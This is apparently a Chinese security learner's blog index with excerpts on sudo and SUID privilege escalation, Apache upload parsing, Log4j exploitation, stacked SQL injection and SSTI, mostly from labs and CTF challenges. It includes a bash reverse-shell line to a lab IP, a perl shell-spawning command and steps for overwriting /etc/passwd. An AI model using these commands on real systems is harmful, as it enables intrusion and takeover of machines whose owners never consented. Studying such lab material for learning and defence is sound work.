自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(23)
  • 收藏
  • 关注

原创 sudo提权

sudo权限的配置文件位于/etc/sudoers,当普通用户使用sudo命令时,linux系统会在sudoers文件中查找当前用户,根据当前用户权限配置来决定是否可以运行相关命令。利用less提权:输入sudo less /etc/hosts浏览文件内容时,在底部输入!利用man提权:通过sudo man man命令打开man使用手册,同时会进入编辑行,输入!利用vi提权:通过sudo vi会进入默认页,输入:!利用perl提权:sudo perl -e 'exec "/bin/bash";

2023-07-20 10:31:31 1373

原创 SUID提权(find配置不当)

备份passwd文件,使用openssl passwd生成一个密码,再使用python搭建一个http服务,然后使用本地物理机下载passwd备份文件。在本地使用python开启http服务并将passwd备份文件放到该目录下,使用wget -0下载该备份文件并覆盖原有的passwd文件。suid权限解释:当文件被设置了suid权限后表示该文件被执行时会将当前的用户权限暂时切换为文件所有者的权限(所有者一般为root)发现find命令,使用find的-exec参数将wget命令也增加suid权限。

2023-07-19 19:39:55 241

原创 Apache解析漏洞

Apache解析漏洞成因:Apache默认一个文件允许有多个.来分隔后缀,当解析文件时从右向左解析,直到碰到能够解析的后缀名,就将该文件作为这个后缀名的文件来执行。2、尝试Apache的解析漏洞,将文件名修改为1.php.pnga,然后修改hex值,将a所对应的hex值更改为0a,然后发送,发现成功上传。1、上传一个1.php,发现该文件类型不被支持,且返回包中含有Apache的版本信息。3、使用蚁剑可以成功连接。

2023-07-12 14:18:00 316

原创 Log4j(CVE-2021-44228)

使用POC: bash -i >& /dev/tcp/192.168.211.130/6666 0>&1,然后对该POC进行base64编码,使用漏洞利用工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar(工具要在kali中使用,windows中使用无效)进入到vulhub里的指定漏洞库,打开环境:docker-compose up -d。选择工具生成的一个exp进行利用,访问后成功反弹shell。

2023-07-12 10:43:03 109 1

原创 supersqli

首先输入有个单引号,出现报错信息,说明是单引号闭合的字符型注入 输入'#发现成功闭合 使用order by判断出字段数为2,然后使用select查询,但发现select被过滤了 然后我们可以尝试堆叠注入,输入:';show tables;--+,发现存在两个表 查看表的结构:这里由于有一个表的名字为纯数字,所以需要使用反引号括起来,payload为:';show columns from `1919810931114514`;--+,发现存在一列为flag 想要查询flag列但select

2023-06-12 13:46:40 82

原创 SSTI(模板注入)

SSTI注入形成示例如下:payload:{{config}}(用来测试是否存在SSTI注入)SSTI基本的思路就是通过找到合适的魔术方法,一步步去执行,从而得到我们想要的结果。返回结果成功执行系统命令并显示whoami信息。一个简单的使用flask创建的web服务器程序。安全的flask程序编写如下。控制台下也会产生访问记录。

2023-06-02 20:06:03 323

原创 Web_php_unserialize

_wakeup函数:unserialize函数会检查是否存在wakeup函数,如果存在,则会先调用__wakeup函数,预先准备对象所需的资源。__wakeup()执行漏洞,一个字符串或对象被序列化后,如果其属性被修改,则不执行__wakeup函数,这是一个绕过点。__construct函数:具有该函数的类会在每次创建对象时先调用此方法,作初始化工作。__destruct函数:会在某个对象的所有引用都被删除或者对象被显示销毁时执行。__sleep函数会在序列化之前被调用。拿到题目看到一段代码。

2023-06-01 17:52:54 104

原创 记一次艰难的在pycharm中下载包的经历

pycharm中安装包

2023-03-23 19:19:29 342

原创 Bugku-eval

Bugku-eval

2023-03-03 00:04:21 52

原创 Bugku-bp

Bugku-bp

2023-03-02 23:45:01 59

原创 firefox运行时设置断点修改js变量

firefox运行时设置断点修改js变量

2023-02-25 11:42:53 1035 1

原创 pikachu(xss)

pikachu xss

2023-02-23 19:33:35 149

原创 pikachu(暴力破解)

pikachu 暴力破解

2023-02-23 18:41:26 120

原创 upload(1~10)

文件上传之upload-labs

2022-11-27 00:36:41 411

原创 sql注入之时间盲注

sql注入之时间盲注

2022-11-25 21:26:19 324

原创 sql注入之布尔盲注

sql注入之布尔盲注

2022-11-25 20:44:21 386

原创 sql注入之into outfile

sql注入之into outfile

2022-11-25 18:34:15 2502

原创 xss-labs(11~16)

xss-labs

2022-11-20 16:32:14 132

原创 sqli-labs(1-6)

sql注入

2022-11-18 21:24:10 662

原创 ctfhub--svn泄露

ctfhub之svn泄露

2022-11-17 20:26:26 541

原创 ctfhub--stash

ctfhub--stash

2022-11-17 11:35:22 417

原创 ctfhub--log

ctfhub之log过关

2022-11-16 20:46:34 474

原创 xss—labs通关(1-10)

xss

2022-11-15 17:50:42 284

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除